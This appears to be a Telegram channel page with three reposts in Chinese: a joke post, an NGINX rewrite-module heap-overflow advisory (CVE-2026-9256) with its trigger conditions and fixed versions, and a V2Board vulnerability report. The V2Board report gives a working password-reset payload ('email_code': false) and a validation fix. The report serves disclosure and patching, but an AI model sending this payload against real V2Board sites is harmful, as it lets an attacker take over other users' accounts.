Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
211
Подписчики
Нет данных24 часа
+17 дней
+2730 день
Архив постов
Repost from 亚托莉世界第一可爱
对不起,各位哥哥姐姐,其实我一直在欺骗你们,伪装成一个大人真的好累啊,每天都要在意自己的言行举止,我现在想说出真相了,我其实今年刚上小学三年级。今天是儿童节可以送我礼物吗?我只要一年chatgpt pro 20x订阅+ 1年Google AI ultra订阅+ー年claude订阅+ー年CN2-GIA+AS9929+CMIN2双向三网优化的vps服务器就行了
Repost from 海豚机场测评|用户侧体验|测速频道
NGINX 再曝高危漏洞:rewrite 模块堆溢出可致 RCE(CVE-2026-9256)
NGINX Plus 与 NGINX Open Source 的
ngx_http_rewrite_module 存在堆缓冲区溢出漏洞,触发条件为:rewrite 指令中使用了含有嵌套重叠 PCRE 捕获组的正则(如 ^/((.*))$),且替换字符串同时引用多个捕获组(如 $1$2)并用于 redirect 或 arguments 场景。在此条件下,NGINX 低估 URI 转义后的输出长度,导致 worker 进程堆溢出,未认证攻击者可通过构造特定 HTTP 请求稳定触发 DoS;在 ASLR 未启用或可被绕过的系统上,存在进一步实现 RCE 的可能。此前已针对 CVE-2026-42945 升级至 1.31.0 / 1.30.1 的环境对本漏洞仍然暴露,需再次升级。修复版本:NGINX Open Source 1.31.1 / 1.30.2,NGINX Plus R36 P5 / R37.0.1.1。
来源:https://nvd.nist.gov/vuln/detail/CVE-2026-9256
Repost from 🏭遙ラボ
V2Board及其所有分支漏洞,影响全部版本,该漏洞可修改一切已注册用户账号密码
复现方式:
API端点:
api/v1/passport/auth/forget
Payload:
{
"email":"任意一个已注册用户",
"password": "密码",
"email_code": false
}
app/Http/Requests/Passport/AuthForget.php
找到'email_code' => 'required'
改成'email_code' => 'required|string|digits:6'
